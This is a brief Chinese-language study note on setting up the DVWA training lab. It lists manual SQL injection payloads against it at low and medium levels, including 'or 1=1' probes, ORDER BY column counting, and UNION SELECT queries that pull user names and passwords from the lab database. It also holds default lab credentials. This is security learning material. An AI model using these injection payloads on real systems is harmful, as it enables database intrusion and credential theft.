学习笔记—DVWA
一、安装dvwa
步骤:https://www.cnblogs.com/sevenbug/p/11417100.html
注:修改成自己数据库的密码。
账号:admin 密码:password
安装test靶机
直接访问:192.168.1.102
安装web练习1
密码:123456
用dvwa进行注入:
参考一次重测案例:https://mp.weixin.qq.com/s/PJMtil2tO79o4xHLXdUhuw
1
1‘
1‘ and 1=1
1’ and ‘1’=’1’
1’ and ‘1’=’2’
1’or ‘1’='1
二、在火狐中操作:
1.Dvwa 低sql手工
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1 or 1=1 order by 2 --+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1 or 1=1&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1%27+or+1%3D1+order+by+2+%23&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1%27+or+1%3D1+order+by+3+%23&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1%27+union+select+user%2cpassword+from+dvwa.users+%23&Submit=Submit#
2.Dvwa 中sql手工
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id%20=1%20union%20select%20group_concat(user),group_concat(password)from%20dvwa.users%20–%20&Submit=submit#
id=2 union select 1,COLUM_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x64767761 and TABLE_NAME=0x7573657273 & Submit=Submit
3.Dvwa 高sql手工
4.Sql injection(Blind)
了解更多请关注下列公众号: